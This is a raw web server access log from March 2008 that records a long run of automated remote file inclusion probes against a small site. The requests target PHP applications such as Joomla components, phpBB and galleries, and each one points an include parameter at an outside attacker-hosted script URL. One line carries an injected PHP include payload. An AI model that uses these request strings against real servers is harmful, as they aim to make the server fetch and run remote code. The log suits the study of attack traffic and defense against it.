66.70.14.90 - - [17/Mar/2008:05:47:34 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.compassoc.com/themes/ca/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:05:47:56 -0700] "GET /logs/access_080225.log/index.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:05:47:56 -0700] "GET /logs/access_080225.log/index.php?x=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
88.165.38.69 - - [17/Mar/2008:05:47:57 -0700] "GET /logs/access_071225.log/Finishedhttp://simoneleitao.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
74.52.9.218 - - [17/Mar/2008:05:48:27 -0700] "GET /errors.php?error=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
92.43.20.34 - - [17/Mar/2008:05:48:49 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.nedaleko.ru/en/img/contr.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
92.43.20.34 - - [17/Mar/2008:05:48:49 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.nedaleko.ru/en/img/contr.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
74.52.9.218 - - [17/Mar/2008:05:48:51 -0700] "GET /errors.php?error=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [17/Mar/2008:05:48:53 -0700] "GET /errors.php?error=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [17/Mar/2008:05:48:59 -0700] "GET /errors.php?error=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.200.80.252 - - [17/Mar/2008:05:49:00 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://schq.ca/cache/riCo?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
74.52.9.218 - - [17/Mar/2008:05:49:00 -0700] "GET /errors.php?error=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.200.80.252 - - [17/Mar/2008:05:49:00 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://schq.ca/cache/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
88.165.38.69 - - [17/Mar/2008:05:49:13 -0700] "GET /logs/access_080204.log/Finishedhttp://simoneleitao.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
74.52.9.218 - - [17/Mar/2008:05:49:16 -0700] "GET /errors.php?error=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [17/Mar/2008:05:49:19 -0700] "GET /errors.php?error=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.85.201.66 - - [17/Mar/2008:05:49:20 -0700] "GET /errors.php?error=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.239.150 - - [17/Mar/2008:05:49:37 -0700] "GET /logs/access_080211.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.132.157 - - [17/Mar/2008:05:49:40 -0700] "GET /logs/access_080124.log//includes/kb_constants.php?module_root_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.132.157 - - [17/Mar/2008:05:49:40 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.53.138.29 - - [17/Mar/2008:05:49:43 -0700] "GET /errors.php?error=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.53.138.29 - - [17/Mar/2008:05:49:46 -0700] "GET /errors.php?error=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.132.157 - - [17/Mar/2008:05:50:08 -0700] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.175.42 - - [17/Mar/2008:05:50:12 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
70.85.175.42 - - [17/Mar/2008:05:50:12 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
70.85.175.42 - - [17/Mar/2008:05:50:12 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.caccolas/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
70.85.175.42 - - [17/Mar/2008:05:50:12 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.caccolas/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
70.85.175.42 - - [17/Mar/2008:05:50:12 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.roxowner.110mb.com/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
70.85.175.42 - - [17/Mar/2008:05:50:12 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.roxowner.110mb.com/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
83.136.83.94 - - [17/Mar/2008:05:50:15 -0700] "GET /logs/index.php?redir=http://bestlist.t35.com/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
83.136.83.94 - - [17/Mar/2008:05:50:15 -0700] "GET /index.php?redir=http://bestlist.t35.com/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
208.53.138.29 - - [17/Mar/2008:05:50:24 -0700] "GET /errors.php?error=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.165.38.69 - - [17/Mar/2008:05:50:36 -0700] "GET /logs/access_080129.log/Finishedhttp://simoneleitao.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
88.165.38.69 - - [17/Mar/2008:05:50:54 -0700] "GET /logs/access_071229.log/Finishedhttp://simoneleitao.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
88.165.38.69 - - [17/Mar/2008:05:50:56 -0700] "GET /logs/access_080131.log/Finishedhttp://simoneleitao.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
88.165.38.69 - - [17/Mar/2008:05:50:59 -0700] "GET /logs/access_071231.log/Finishedhttp://simoneleitao.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
217.107.222.127 - - [17/Mar/2008:05:51:03 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.165.38.69 - - [17/Mar/2008:05:51:04 -0700] "GET /logs/access_080225.log/Finishedhttp://simoneleitao.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
88.165.38.69 - - [17/Mar/2008:05:51:04 -0700] "GET /logs/access_071228.log/Finishedhttp://simoneleitao.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
86.197.68.38 - - [17/Mar/2008:05:51:29 -0700] "GET /errors.php?error=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
86.197.68.38 - - [17/Mar/2008:05:51:29 -0700] "GET /errors.php?error=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
72.36.235.74 - - [17/Mar/2008:05:52:15 -0700] "GET /logs/access_080204.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.235.74 - - [17/Mar/2008:05:52:15 -0700] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.222.23.213 - - [17/Mar/2008:05:52:21 -0700] "GET /logs/access_080228.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://veldega-tour.ru/.log/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.222.23.213 - - [17/Mar/2008:05:52:22 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://veldega-tour.ru/.log/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.222.23.213 - - [17/Mar/2008:05:52:29 -0700] "GET /logs/access_080204.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://veldega-tour.ru/.log/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:05:52:34 -0700] "GET /logs/access_080228.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.165.38.69 - - [17/Mar/2008:05:53:06 -0700] "GET /logs/access_080211.log/Finishedhttp://simoneleitao.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
66.199.248.34 - - [17/Mar/2008:05:53:50 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://horyzonty.intarnet.pl/albums/userpics/.yop/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.199.248.34 - - [17/Mar/2008:05:53:51 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://horyzonty.intarnet.pl/albums/userpics/.yop/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.199.248.34 - - [17/Mar/2008:05:53:51 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://horyzonty.intarnet.pl/albums/userpics/.yop/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.214.191 - - [17/Mar/2008:05:55:43 -0700] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.181.99.83 - - [17/Mar/2008:05:56:06 -0700] "GET /logs/access_080122.log/errors.php?error=http://contactcraze.com/cmd-asc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.99.83 - - [17/Mar/2008:05:56:06 -0700] "GET /errors.php?error=http://contactcraze.com/cmd-asc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.99.83 - - [17/Mar/2008:05:56:07 -0700] "GET /logs/errors.php?error=http://contactcraze.com/cmd-asc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.208.31 - - [17/Mar/2008:05:57:38 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
75.126.182.170 - - [17/Mar/2008:05:58:49 -0700] "GET /logs/access_080207.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.208.31 - - [17/Mar/2008:05:59:56 -0700] "GET /logs///components/com_performs/performs.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
69.72.208.31 - - [17/Mar/2008:05:59:56 -0700] "GET ///components/com_performs/performs.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
84.246.21.243 - - [17/Mar/2008:06:00:10 -0700] "GET /logs/access_080101.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:06:02:42 -0700] "GET /logs/access_080228.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:06:02:42 -0700] "GET /logs/access_080228.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:06:02:42 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
88.54.187.234 - - [17/Mar/2008:06:03:06 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
208.53.138.29 - - [17/Mar/2008:06:03:48 -0700] "GET /logs/errors.php?error=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.53.138.29 - - [17/Mar/2008:06:03:52 -0700] "GET /logs/access_080122.log/errors.php?error=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.36.234 - - [17/Mar/2008:06:04:01 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.indoirc.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.36.234 - - [17/Mar/2008:06:04:15 -0700] "GET /logs/access_080119.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.indoirc.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:06:04:21 -0700] "GET /logs/access_080215.log//components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.18.207.64 - - [17/Mar/2008:06:04:22 -0700] "GET /logs//community/index.php?from_market=Y&pageurl=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.25.160 - - [17/Mar/2008:06:04:23 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://abb.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.25.160 - - [17/Mar/2008:06:04:23 -0700] "GET /logs/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://abb.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.164.242.195 - - [17/Mar/2008:06:04:31 -0700] "GET /logs/access_080225.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.indoirc.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.164.242.195 - - [17/Mar/2008:06:04:32 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.indoirc.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.164.242.195 - - [17/Mar/2008:06:04:38 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.indoirc.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.18.207.64 - - [17/Mar/2008:06:04:39 -0700] "GET /logs/access_080122.log//community/index.php?from_market=Y&pageurl=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.164.242.195 - - [17/Mar/2008:06:05:02 -0700] "GET /logs/access_080119.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.indoirc.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.218.53.244 - - [17/Mar/2008:06:05:21 -0700] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://fulls.iespana.es/testir.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
72.218.53.244 - - [17/Mar/2008:06:05:23 -0700] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
72.218.53.244 - - [17/Mar/2008:06:05:23 -0700] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.etclan.eu/downloads/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
72.218.53.244 - - [17/Mar/2008:06:05:23 -0700] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://fulls.iespana.es/testir.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
209.85.114.4 - - [17/Mar/2008:06:06:54 -0700] "GET /logs//tools/send_reminders.php?includedir=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
209.85.114.4 - - [17/Mar/2008:06:06:54 -0700] "GET //tools/send_reminders.php?includedir=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
74.53.58.10 - - [17/Mar/2008:06:09:08 -0700] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
75.126.36.234 - - [17/Mar/2008:06:09:09 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.indoirc.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.58.10 - - [17/Mar/2008:06:09:09 -0700] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
81.89.137.99 - - [17/Mar/2008:06:09:18 -0700] "GET /logs/access_080225.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.41.19 - - [17/Mar/2008:06:09:32 -0700] "GET /errors.php?error=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.198.21.196 - - [17/Mar/2008:06:09:38 -0700] "GET //?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 200 3094 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.25.160 - - [17/Mar/2008:06:09:52 -0700] "GET /logs/access_080211.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://abb.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:06:11:04 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:06:11:04 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
202.142.220.82 - - [17/Mar/2008:06:11:17 -0700] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://fulls.iespana.es/testir.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
202.142.220.82 - - [17/Mar/2008:06:11:17 -0700] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://fulls.iespana.es/testir.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
86.197.68.38 - - [17/Mar/2008:06:13:01 -0700] "GET /logs/access_080122.log/errors.php?error=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
86.197.68.38 - - [17/Mar/2008:06:13:01 -0700] "GET /logs/access_080122.log/errors.php?error=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
86.197.68.38 - - [17/Mar/2008:06:13:01 -0700] "GET /logs/errors.php?error=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
86.197.68.38 - - [17/Mar/2008:06:13:01 -0700] "GET /logs/errors.php?error=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
200.150.15.135 - - [17/Mar/2008:06:13:41 -0700] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.150.15.135 - - [17/Mar/2008:06:13:42 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.150.15.135 - - [17/Mar/2008:06:13:44 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.21.138 - - [17/Mar/2008:06:14:35 -0700] "GET /tools/ HTTP/1.0" 200 12388 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
84.14.51.216 - - [17/Mar/2008:06:14:51 -0700] "GET /index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
84.14.51.216 - - [17/Mar/2008:06:14:51 -0700] "GET /logs/index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
67.228.60.242 - - [17/Mar/2008:06:15:04 -0700] "GET /index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
67.228.60.242 - - [17/Mar/2008:06:15:05 -0700] "GET /logs/index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
211.99.2.85 - - [17/Mar/2008:06:15:32 -0700] "GET /logs/access_080215.log//login.php?dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.227.101.85 - - [17/Mar/2008:06:16:42 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://barges.t35.com/girl/nakis.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.101.85 - - [17/Mar/2008:06:16:42 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://barges.t35.com/girl/nakis.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:06:16:42 -0700] "GET /logs/access_080215.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.93.43.34 - - [17/Mar/2008:06:16:42 -0700] "GET /logs/access_080215.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
